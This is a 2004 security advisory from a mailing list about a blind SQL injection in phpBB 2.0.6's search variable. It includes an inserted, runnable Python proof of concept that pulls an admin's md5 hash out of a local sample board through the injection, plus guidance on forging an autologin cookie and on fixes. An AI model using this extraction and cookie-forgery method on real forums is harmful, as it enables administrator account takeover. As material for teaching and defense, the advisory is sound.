[UNIX] PhpBB SQL Injection In Search Results Variable

Date: 25 Mar 2004 16:54:46 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [UNIX] PhpBB SQL Injection In Search Results Variable

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  PhpBB SQL Injection In Search Results Variable
------------------------------------------------------------------------


SUMMARY

phpBB (http://www.phpbb.com/) is "a high powered, fully scalable, and 
highly customizable open-source bulletin board package. phpBB has a 
user-friendly interface, simple and straightforward administration panel, 
and helpful FAQ. Based on the powerful PHP server language and your choice 
of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the 
ideal free community solution for all web sites."

An SQL injection vulnerability exists in phpBB's search code via the 
$search_results variable. It is exploitable when PHP's register_globals is 
set to "on", because that setting lets a request parameter of the same name 
populate the variable before it reaches the query.

DETAILS

Vulnerable Systems:
 * phpBB version 2.0.6

The injection point is the $search_results variable used when performing a 
search. On line 711, in the code path taken when $show_results is set to 
neither 'posts' nor 'topics', the variable is interpolated directly into the 
IN (...) list of the following query. With register_globals on, an attacker 
who supplies search_results as a request parameter controls that list 
unsanitized:

$sql = "SELECT t.*, f.forum_id, f.forum_name, u.username, u.user_id,
               u2.username as user2, u2.user_id as id2, p.post_username,
               p2.post_username AS post_username2, p2.post_time
        FROM " . TOPICS_TABLE . " t, " . FORUMS_TABLE . " f, " . USERS_TABLE . " u, "
             . POSTS_TABLE . " p, " . POSTS_TABLE . " p2, " . USERS_TABLE . " u2
        WHERE t.topic_id IN ($search_results)
              AND t.topic_poster = u.user_id
              AND f.forum_id = t.forum_id
              AND p.post_id = t.topic_first_post_id
              AND p2.post_id = t.topic_last_post_id
              AND u2.user_id = p2.poster_id";

The users table is among the tables joined by this SELECT (aliases u and 
u2). That turns the injection point into a blind, boolean SQL injection: the 
attacker closes the IN (...) list, appends a condition on u.user_password, 
and observes whether the search page returns results or not. Because 
MySQL 3 has no subqueries, the attacker cannot query the users table on his 
own; the fact that it is already joined is what makes the attack work, and 
the admin's password hash can be recovered one character at a time this 
way. Once the hash is known, phpBB's autologin feature, whose cookie carries 
the hash itself, lets the attacker forge a cookie and log in as the 
administrator without ever cracking the password.
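The following is an added worked example, not code from the advisory or from phpBB. It rebuilds the advisory's query over a constructed in-memory SQLite stand-in for the phpBB tables, so the table names, sample users and the admin's sample password are assumptions; the function names search_topics_vulnerable, search_topics_fixed, oracle and extract_admin_hash are this example's own. It shows the boolean-blind extraction of the admin's md5 hash through the IN (...) list using only the already-joined users table (the constraint MySQL 3 imposes), and places the hardened form of the query beside the vulnerable one.

```python
import hashlib
import sqlite3

# Constructed stand-in for the phpBB 2.0.6 tables the advisory's query touches
# (only the columns that query needs); not phpBB's real schema.
SCHEMA = """
CREATE TABLE phpbb_users  (user_id INTEGER, username TEXT, user_password TEXT);
CREATE TABLE phpbb_forums (forum_id INTEGER, forum_name TEXT);
CREATE TABLE phpbb_posts  (post_id INTEGER, poster_id INTEGER,
                           post_username TEXT, post_time INTEGER);
CREATE TABLE phpbb_topics (topic_id INTEGER, forum_id INTEGER, topic_poster INTEGER,
                           topic_first_post_id INTEGER, topic_last_post_id INTEGER);
"""

ADMIN_HASH = hashlib.md5(b"sample-admin-password").hexdigest()  # constructed sample

# The advisory's query, with the contents of IN (...) left as a slot.
QUERY = """SELECT t.*, f.forum_id, f.forum_name, u.username, u.user_id,
                  u2.username AS user2, u2.user_id AS id2, p.post_username,
                  p2.post_username AS post_username2, p2.post_time
           FROM phpbb_topics t, phpbb_forums f, phpbb_users u,
                phpbb_posts p, phpbb_posts p2, phpbb_users u2
           WHERE t.topic_id IN ({in_list})
                 AND t.topic_poster = u.user_id
                 AND f.forum_id = t.forum_id
                 AND p.post_id = t.topic_first_post_id
                 AND p2.post_id = t.topic_last_post_id
                 AND u2.user_id = p2.poster_id"""


def make_board():
    """Build the sample board: admin (user_id 2, as phpBB 2 numbers its first
    real account) started topic 1, alice posted the last reply."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO phpbb_users VALUES (?, ?, ?)", [
        (2, "admin", ADMIN_HASH),
        (3, "alice", hashlib.md5(b"alice").hexdigest()),
    ])
    conn.execute("INSERT INTO phpbb_forums VALUES (1, 'General')")
    conn.executemany("INSERT INTO phpbb_posts VALUES (?, ?, ?, ?)",
                     [(10, 2, "admin", 1000), (11, 3, "alice", 1001)])
    conn.execute("INSERT INTO phpbb_topics VALUES (1, 1, 2, 10, 11)")
    return conn


def search_topics_vulnerable(conn, search_results):
    """$search_results spliced in verbatim, as the advisory describes."""
    return conn.execute(QUERY.format(in_list=search_results)).fetchall()


def search_topics_fixed(conn, search_results):
    """Hardened form: accept only a comma-separated list of integers and bind
    each ID as a parameter, so nothing but numbers can reach the IN list."""
    ids = [int(x) for x in search_results.split(",")]  # ValueError on anything else
    placeholders = ", ".join("?" * len(ids))
    return conn.execute(QUERY.format(in_list=placeholders), ids).fetchall()


def oracle(conn, condition):
    """Boolean oracle: does the search return any row under the injected test?
    The payload closes IN (...) and ORs in a test on the already-joined users
    table u; the query's own ')' closes our '('. Since AND binds tighter than
    OR, the rest of the WHERE clause must still hold, so the admin has to have
    started at least one topic for a row to come back (true on this board)."""
    payload = f"0) OR (u.user_id = 2 AND {condition}"
    return bool(search_topics_vulnerable(conn, payload))


def extract_admin_hash(conn, length=32, alphabet="0123456789abcdef"):
    """Recover the md5 hex hash one character at a time via LIKE prefix tests."""
    found = ""
    while len(found) < length:
        for ch in alphabet:
            if oracle(conn, f"u.user_password LIKE '{found}{ch}%'"):
                found += ch
                break
        else:
            raise RuntimeError(f"no hex digit matched at position {len(found)}")
    return found


def fixed_rejects(conn, search_results):
    """True when the hardened query refuses the input instead of running it."""
    try:
        search_topics_fixed(conn, search_results)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    board = make_board()
    recovered = extract_admin_hash(board)
    print("recovered:", recovered, "correct:", recovered == ADMIN_HASH)
    print("hardened query rejects payload:", fixed_rejects(board, "0) OR (1=1"))
```

The extraction needs at most 16 requests per hex digit, 512 for the whole hash, and never a subquery; the same prefix-LIKE loop works against MySQL 3 because the users table is reached through the join the application already performs. The fix is the standard one: treat the ID list as data, validate it as integers, and bind it, rather than trusting a variable that register_globals lets the client set.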

A proof of concept script can be found at 
http://www.scan-associates.net/papers/gemuruh-v2.php.txt.

Workaround
Turn off register_globals in the PHP configuration file (register_globals = 
Off in php.ini, or php_flag register_globals off in a per-directory 
.htaccess where PHP runs as an Apache module). With the directive off, a 
client-supplied search_results parameter no longer populates $search_results.


ADDITIONAL INFORMATION

The information has been provided by pokley ([email protected]).




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
